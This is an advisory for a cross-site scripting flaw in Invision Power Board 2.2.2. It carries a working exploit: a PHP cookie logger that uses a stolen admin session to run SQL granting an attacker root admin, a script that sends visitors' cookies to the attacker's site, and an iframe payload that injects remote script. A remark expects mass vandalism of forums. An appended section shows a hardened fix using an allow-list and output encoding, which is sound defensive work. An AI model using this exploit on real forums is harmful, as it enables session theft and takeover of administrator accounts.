Invision Power Board Cross Site Scripting Vulnerability
------------------------------------------------------------------------

SUMMARY

A vulnerability in Invision Power Board allows remote attackers to cause a cross site scripting vulnerability, which in turn can be used to cause the administrator of the forum, or any other privileged user, to execute arbitrary commands (SQL commands). The following exploit code can be used to test your system for the mentioned vulnerability.

DETAILS

Vulnerable Systems:
 * Invision Power Board version 2.2.2

Exploit:

Code:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (http://www.ironwarez.info)
#
# Greets to all RootShell Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
#  See:

    var editor_id         = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
 
#
# $_REQUEST['editorid'] isn't sanitized in any way, so it allows
# other users to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin

$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";

$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<iframe width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql&section=admin&query=UPDATE+'.$prefix.'members+SET+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'.$member.'%27&st="></iframe>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#  Also create a file in the same directory named "log.txt" and chmod it 777
#
#  Now, create a file called script.js on your webserver, put this code in it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
#
#  And, last but not least, create a file that combines those two ;)
#  Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#

<iframe border=0 
src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 
#
# Now, post a message on the forum or send a pm to your target with the link to the html page.
#  If a normal user views the page, his cookies
#  will be logged, funny. If an admin visits the page and he has an admin_session_id cookie set,
# he will add you to the root admin group without even knowing ;).

ADDITIONAL INFORMATION

The information has been provided by Iron.
The original article can be found at: http://www.ironwarez.info

Comment: a whole batch of IPB boards is about to get vandalized.
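
Added example (not part of the original advisory, and not Invision's actual patch): a hardened form of the vulnerable editor_id line quoted in the post, with an allow-list on editorid and JavaScript-context encoding on output. The function names, the allowed character set, the fallback id ed-0 and the attacker.invalid sample input are assumptions made for illustration.

```php
<?php
// Added example, not IPB's own code. All function names are hypothetical.

// Allow-list check. Assumption: legitimate editor ids are short identifiers
// made of letters, digits, underscore and hyphen.
function editor_id_is_valid(string $raw): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $raw) === 1;
}

// Encode a string as a JavaScript string literal. The JSON_HEX_* flags turn
// <, >, &, ' and " into \uXXXX escapes, so the value can neither end the
// literal nor close the surrounding script element.
function js_string_literal(string $value): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_THROW_ON_ERROR;
    return json_encode($value, $flags);
}

// Replacement for the vulnerable print statement: validate first, then
// encode for the JavaScript context instead of concatenating raw input.
function render_editor_id(array $request): string
{
    $raw = $request['editorid'] ?? '';
    if (!is_string($raw) || !editor_id_is_valid(trim($raw))) {
        $raw = 'ed-0'; // hypothetical safe fallback id
    }
    return 'var editor_id = ' . js_string_literal(trim($raw)) . ';';
}

// Constructed sample inputs: a normal id, a value shaped like the one in the
// post (placeholder host), and a non-string parameter (editorid[]=x).
$samples = [
    'ed-0',
    '//--></script><script src=http://attacker.invalid/script.js>',
    ['nested' => 'array'],
];
foreach ($samples as $sample) {
    echo render_editor_id(['editorid' => $sample]), "\n";
}

// Encoding on its own, without the allow-list, still stays inside the literal.
echo js_string_literal($samples[1]), "\n";
```

The allow-list alone closes this injection point; the encoder is the part to reuse for any other request value that has to be echoed into a script block.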